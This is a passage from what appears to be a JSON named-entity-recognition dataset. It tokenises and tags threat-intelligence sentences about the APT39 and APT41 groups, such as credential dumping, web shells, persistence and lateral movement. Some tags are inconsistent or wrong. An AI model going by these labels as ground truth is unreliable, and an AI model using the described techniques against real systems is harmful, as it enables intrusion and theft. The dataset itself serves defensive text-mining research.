"has", - "used", - "different", - "versions", - "of", - "Mimikatz", - "to", - "obtain", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "PowerShell", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "a", - "command", - "line", - "utility", - "and", - "a", - "network", - "scanner", - "written", - "in", - "python." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "various", - "strains", - "of", - "malware", - "to", - "query", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "maintained", - "persistence", - "using", - "the", - "startup", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "been", - "seen", - "using", - "RDP", - "for", - "lateral", - "movement", - "and", - "persistence,", - "in", - "some", - "cases", - "employing", - "the", - "rdpwinst", - "tool", - "for", - "mangement", - "of", - "multiple", - "sessions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "NBTscan", - "and", - "custom", - "tools", - "to", - "discover", - "remote", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "SMB", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "used", - "secure", - "shell", - "(SSH)", - "to", - "move", - "laterally", - "among", - "their", - "targets." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "created", - "scheduled", - "tasks", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "a", - "screen", - "capture", - "utility", - "to", - "take", - "screenshots", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "post-exploitation", - "tools", - "including", - "RemCom", - "and", - "the", - "Non-sucking", - "Service", - "Manager", - "(NSSM)", - "to", - "execute", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "modified", - "LNK", - "shortcuts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "packed", - "tools", - "with", - "UPX,", - "and", - "has", - "repacked", - "a", - "modified", - "version", - "of", - "Mimikatz", - "to", - "thwart", - "anti-virus", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "leveraged", - "spearphishing", - "emails", - "with", - "malicious", - "attachments", - "to", - "initially", - "compromise", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "leveraged", - "spearphishing", - "emails", - "with", - "malicious", - "links", - "to", - "initially", - "compromise", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "used", - "Remexi", - "to", - "collect", - "usernames", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "modified", - "and", - "used", - "customized", - "versions", - "of", - "publicly-available", - "tools", - "like", - "PLINK", - "and", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "stolen", - "credentials", - "to", - "compromise", - "Outlook", - "Web", - "Access", - "(OWA)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "utilized", - "malicious", - "VBS", - "scripts", - "in", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "used", - "HTTP", - "in", - "communications", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT39", - "has", - "installed", - "ANTAK", - "and", - "ASPXSPY", - "web", - "shells." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "leveraged", - "sticky", - "keys", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "added", - "user", - "accounts", - "to", - "the", - "User", - "and", - "Admin", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "created", - "a", - "RAR", - "archive", - "of", - "targeted", - "files", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "BITSAdmin", - "to", - "download", - "and", - "install", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "deployed", - "Master", - "Boot", - "Record", - "bootkits", - "on", - "Windows", - "systems", - "to", - "hide", - "their", - "malware", - "and", - "maintain", - "persistence", - "on", - "victim", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "attempted", - "to", - "remove", - "evidence", - "of", - "some", - "of", - "its", - "activity", - "by", - "deleting", - "Bash", - "histories." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT41", - "attempted", - "to", - "remove", - "evidence", - "of", - "some", - "of", - "its", - "activity", - "by", - "clearing", - "Windows", - "security", - "and", - "system", - "events." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "cloned", - "victim", - "user", - "Git", - "repositories", - "during", - "intrusions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "leveraged", - "code-signing", - "certificates", - "to", - "sign", - "malware", - "when", - "targeting", - "both", - "gaming", - "and", - "non-gaming", - "organizations." - ], - "ner_tags": [ - "B-Idus", - "B-Org", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "compiled", - "HTML", - "(.chm)", - "files", - "for", - "targeting." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "gained", - "access", - "to", - "production", - "environments", - "where", - "they", - "could", - "inject", - "malicious", - "code", - "into", - "legitimate,", - "signed", - "files", - "and", - "widely", - "distribute", - "them", - "to", - "end", - "users." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "To", - "support", - "initial", - "access,", - "APT41", - "gained", - "access", - "to", - "databases", - "with", - "information", - "about", - "existing", - "accounts", - "as", - "well", - "as", - "plaintext", - "and", - "hashed", - "passwords." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "BrowserGhost,", - "a", - "tool", - "designed", - "to", - "obtain", - "credentials", - "from", - "browsers,", - "to", - "retrieve", - "information", - "from", - "password", - "stores." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "used", - "search", - "order", - "hijacking", - "to", - "execute", - "malicious", - "payloads,", - "such", - "as", - "Winnti", - "RAT." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "APT41", - "used", - "legitimate", - "executables", - "to", - "perform", - "DLL", - "side-loading", - "of", - "their", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "DNS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "a", - "ransomware", - "called", - "Encryptor", - "RaaS", - "to", - "encrypt", - "files", - "on", - "the", - "targeted", - "systems", - "and", - "provide", - "a", - "ransom", - "note", - "to", - "the", - "user." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "transfers", - "post-exploitation", - "files", - "dividing", - "the", - "payload", - "into", - "fixed-size", - "chunks", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "uploaded", - "files", - "and", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "legitimate", - "websites", - "for", - "C2", - "through", - "dead", - "drop", - "resolvers", - "(DDR),", - "including", - "GitHub,", - "Pastebin,", - "and", - "Microsoft", - "TechNet." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "built-in", - "<code>net</code>", - "commands", - "to", - "enumerate", - "domain", - "administrator", - "users." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "used", - "DGAs", - "to", - "change", - "their", - "C2", - "servers", - "monthly." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "configured", - "payloads", - "to", - "load", - "via", - "LD_PRELOAD." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "To", - "support", - "initial", - "access,", - "APT41", - "gained", - "access", - "to", - "databases", - "with", - "information", - "about", - "existing", - "accounts", - "and", - "lists", - "of", - "employees." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org" - ] - }, - { - "tokens": [ - "APT41", - "has", - "encrypted", - "payloads", - "using", - "the", - "Data", - "Protection", - "API", - "(DPAPI),", - "which", - "relies", - "on", - "keys", - "tied", - "to", - "specific", - "user", - "accounts", - "on", - "specific", - "machines.", - "APT41", - "has", - "also", - "environmentally", - "keyed", - "second", - "stage", - "malware", - "with", - "an", - "RC5", - "key", - "derived", - "in", - "part", - "from", - "the", - "infected", - "system's", - "volume", - "serial", - "number." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "exploited", - "CVE-2020-10189", - "against", - "Zoho", - "ManageEngine", - "Desktop", - "Central", - "through", - "unsafe", - "deserialization,", - "and", - "CVE-2019-19781", - "to", - "compromise", - "Citrix", - "Application", - "Delivery", - "Controllers", - "(ADC)", - "and", - "gateway", - "devices.", - "APT41", - "leveraged", - "vulnerabilities", - "such", - "as", - "ProxyLogon", - "exploitation", - "or", - "SQL", - "injection", - "for", - "initial", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Tool", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "leveraged", - "the", - "follow", - "exploits", - "in", - "their", - "operations:", - "CVE-2012-0158,", - "CVE-2015-1641,", - "CVE-2017-0199,", - "CVE-2017-11882,", - "and", - "CVE-2019-3396." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "APT41", - "compromised", - "an", - "online", - "billing/payment", - "service", - "using", - "VPN", - "access", - "between", - "a", - "third-party", - "service", - "provider", - "and", - "the", - "targeted", - "payment", - "service." - ], - "ner_tags": [ - "B-Idus", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O", - "O", - "O", - "B-Org", - "B-Org" - ] - }, - { - "tokens": [ - "APT41", - "used", - "the", - "Steam", - "community", - "page", - "as", - "a", - "fallback", - "mechanism", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "deleted", - "files", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "exploit", - "payloads", - "that", - "initiate", - "download", - "via", - "ftp." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "APT41", - "has", - "executed", - "<code>file", - "/bin/pwd</code>", - "on", - "exploited", - "victims,", - "perhaps", - "to", - "return", - "architecture", - "related", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "developed", - "a", - "custom", - "injector", - "that", - "enables", - "an", - "Event", - "Tracing", - "for", - "Windows", - "(ETW)", - "bypass,", - "making", - "malicious", - "processes", - "invisible", - "to", - "Windows", - "logging." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "certutil", - "to", - "download", - "additional", - "files.", - "APT41", - "downloaded", - "post-exploitation", - "tools", - "such", - "as", - "Cobalt", - "Strike", - "via", - "command", - "shell", - "following", - "initial", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "a", - "keylogger", - "called", - "GEARSHIFT", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "used", - "hashdump,", - "Mimikatz,", - "and", - "the", - "Windows", - "Credential", - "Editor", - "to", - "dump", - "password", - "hashes", - "from", - "memory", - "and", - "authenticate", - "to", - "other", - "user", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "uses", - "remote", - "shares", - "to", - "move", - "and", - "remotely", - "execute", - "payloads", - "during", - "lateral", - "movemement." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "built-in", - "<code>net</code>", - "commands", - "to", - "enumerate", - "local", - "administrator", - "groups." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "created", - "user", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "created", - "services", - "to", - "appear", - "as", - "benign", - "system", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "attempted", - "to", - "masquerade", - "their", - "files", - "as", - "popular", - "anti-virus", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "a", - "malware", - "variant", - "called", - "GOODLUCK", - "to", - "modify", - "the", - "registry", - "in", - "order", - "to", - "steal", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "the", - "storescyncsvc.dll", - "BEACON", - "backdoor", - "to", - "download", - "a", - "secondary", - "backdoor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "ntdsutil", - "to", - "obtain", - "a", - "copy", - "of", - "the", - "victim", - "environment", - "<code>ntds.dit</code>", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "a", - "malware", - "variant", - "called", - "WIDETONE", - "to", - "conduct", - "port", - "scans", - "on", - "specified", - "subnets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "the", - "<code>net", - "share</code>", - "command", - "as", - "part", - "of", - "network", - "reconnaissance." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "VMProtected", - "binaries", - "in", - "multiple", - "intrusions." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "uses", - "tools", - "such", - "as", - "Mimikatz", - "to", - "enable", - "lateral", - "movement", - "via", - "captured", - "password", - "hashes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "performed", - "password", - "brute-force", - "attacks", - "on", - "the", - "local", - "admin", - "account." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "<code>net", - "group</code>", - "commands", - "to", - "enumerate", - "various", - "Windows", - "user", - "groups", - "and", - "permissions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "leveraged", - "PowerShell", - "to", - "deploy", - "malware", - "families", - "in", - "victims’", - "environments." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "malware", - "TIDYELF", - "loaded", - "the", - "main", - "WINTERLOVE", - "component", - "by", - "injecting", - "it", - "into", - "the", - "iexplore.exe", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "a", - "tool", - "called", - "CLASSFON", - "to", - "covertly", - "proxy", - "network", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "queried", - "registry", - "values", - "to", - "determine", - "items", - "such", - "as", - "configured", - "RDP", - "ports", - "and", - "network", - "configurations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "created", - "and", - "modified", - "startup", - "files", - "for", - "persistence.", - "APT41", - "added", - "a", - "registry", - "key", - "in", - "<code>HKLM\\SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\Svchost</code>", - "to", - "establish", - "persistence", - "for", - "Cobalt", - "Strike." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "RDP", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "deployed", - "a", - "Monero", - "cryptocurrency", - "mining", - "tool", - "in", - "a", - "victim’s", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "deployed", - "rootkits", - "on", - "Linux", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "used", - "rundll32.exe", - "to", - "execute", - "a", - "loader." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "transferred", - "implant", - "files", - "using", - "Windows", - "Admin", - "Shares." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "APT41", - "uses", - "the", - "Chinese", - "website", - "fofa.su,", - "similar", - "to", - "the", - "Shodan", - "scanning", - "service,", - "for", - "passive", - "scanning", - "of", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "a", - "compromised", - "account", - "to", - "create", - "a", - "scheduled", - "task", - "on", - "a", - "system." - ], - "ner_tags": [ - "B-Idus", - "I-OffAct", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "extracted", - "user", - "account", - "data", - "from", - "the", - "Security", - "Account", - "Managerr", - "(SAM),", - "making", - "a", - "copy", - "of", - "this", - "database", - "from", - "the", - "registry", - "using", - "the", - "<code>reg", - "save</code>", - "command", - "or", - "by", - "exploiting", - "volume", - "shadow", - "copies." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "used", - "svchost.exe", - "and", - "Net", - "to", - "execute", - "a", - "system", - "service", - "installed", - "to", - "launch", - "a", - "Cobalt", - "Strike", - "BEACON", - "loader." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "uses", - "packers", - "such", - "as", - "Themida", - "to", - "obfuscate", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "sent", - "spearphishing", - "emails", - "with", - "attachments", - "such", - "as", - "compiled", - "HTML", - "(.chm)", - "files", - "to", - "initially", - "compromise", - "their", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "uses", - "multiple", - "built-in", - "commands", - "such", - "as", - "<code>systeminfo</code>", - "and", - "`net", - "config", - "Workstation`", - "to", - "enumerate", - "victim", - "system", - "basic", - "configuration", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "collected", - "MAC", - "addresses", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "enumerated", - "IP", - "addresses", - "of", - "network", - "resources", - "and", - "used", - "the", - "<code>netstat</code>", - "command", - "as", - "part", - "of", - "network", - "reconnaissance.", - "The", - "group", - "has", - "also", - "used", - "a", - "malware", - "variant,", - "HIGHNOON,", - "to", - "enumerate", - "active", - "RDP", - "sessions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "executed", - "<code>whoami</code>", - "commands,", - "including", - "using", - "the", - "WMIEXEC", - "utility", - "to", - "execute", - "this", - "on", - "remote", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT41", - "has", - "obtained", - 